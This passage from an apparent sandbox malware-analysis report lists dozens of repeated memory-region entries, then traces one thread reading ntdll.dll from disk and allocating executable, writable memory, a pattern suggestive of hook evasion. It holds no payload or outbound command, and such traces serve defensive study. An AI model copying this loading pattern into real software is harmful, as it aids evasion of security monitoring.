Region: id = 9414 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9415 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9416 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9417 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9418 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9419 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9420 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9421 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9422 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9423 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9424 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9425 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9426 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9427 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9428 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9429 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9430 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9431 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9432 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9433 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9434 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9435 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9436 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9437 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9438 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9439 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9440 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9441 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9442 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9443 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9444 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9445 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9446 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9447 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9448 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9449 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9450 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9451 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9452 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9453 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9454 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9455 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9456 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9457 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9458 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9459 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9460 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9461 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9462 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9463 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9464 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9465 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9466 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9467 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9468 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9469 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9470 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9471 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9472 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9473 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9474 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9475 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9476 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9477 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9478 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9479 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9480 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9481 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9482 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9483 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9484 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9485 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9486 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9487 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9488 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9489 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9490 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9491 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9492 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9493 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9494 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9495 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9496 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9497 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9498 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9499 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9500 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9501 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9502 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9503 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9504 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9505 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9506 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9507 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9508 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9509 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9510 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9511 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9512 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9513 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9514 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9515 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9516 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9517 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9518 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9519 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9520 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9521 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9522 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9523 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9524 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9525 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9526 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9527 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9528 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9529 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9530 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9531 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9532 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9533 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9534 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9535 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9536 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9537 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9538 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9539 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9540 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9541 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9542 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9543 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9544 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9545 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9546 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9547 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9554 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9555 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9556 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9557 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9558 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9559 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9560 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9561 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9562 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9563 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9564 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9565 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9566 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9567 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9568 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9569 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9570 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9571 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9572 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9573 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9577 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9578 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9582 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9583 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9584 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9585 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9586 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9587 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9589 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9590 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9591 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9592 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9593 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9594 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9595 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9596 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9597 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9598 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9599 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9600 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9601 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9602 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9603 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9604 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9605 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9606 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9607 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9608 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9609 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9610 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9611 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9612 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9613 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9614 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 9615 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 9616 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Thread: id = 44 os_tid = 0xfa4 [0080.722] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x14ee6c | out: HeapArray=0x14ee6c*=0x740000) returned 0x3 [0080.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\ntdll.dll", NtPathName=0x14ee1c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.731] NtCreateFile (in: FileHandle=0x14ee3c, DesiredAccess=0x120089, ObjectAttributes=0x14ee04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14ee24, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14ee3c*=0x60, IoStatusBlock=0x14ee24*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.738] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x751ba0) returned 1 [0080.741] NtQueryInformationFile (in: FileHandle=0x60, IoStatusBlock=0x14ee24, FileInformation=0x14ed7c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x14ee24, FileInformation=0x14ed7c) returned 0x0 [0080.747] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x13bb40) returned 0x1c40020 [0080.785] NtReadFile (in: FileHandle=0x60, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x14ee24, Buffer=0x1c40020, BufferLength=0x13b740, ByteOffset=0x14ed94*=0, Key=0x0 | out: IoStatusBlock=0x14ee24, Buffer=0x1c40020*) returned 0x0 [0080.812] NtClose (Handle=0x60) returned 0x0 [0080.812] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x180001) returned 0x1d80020 [0080.835] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x1c40020) returned 1 [0080.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14ee10*=0x0, ZeroBits=0x0, RegionSize=0x14ee14*=0x302fa0, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x14ee10*=0x1f10000, RegionSize=0x14ee14*=0x303000) returned 0x0 [0080.898] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x751ba0 [0080.898] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x752ba8 [0080.899] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x753bb0 [0080.899] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x754bb8 [0080.899] RtlFreeHeap (HeapHandle=0x740000, 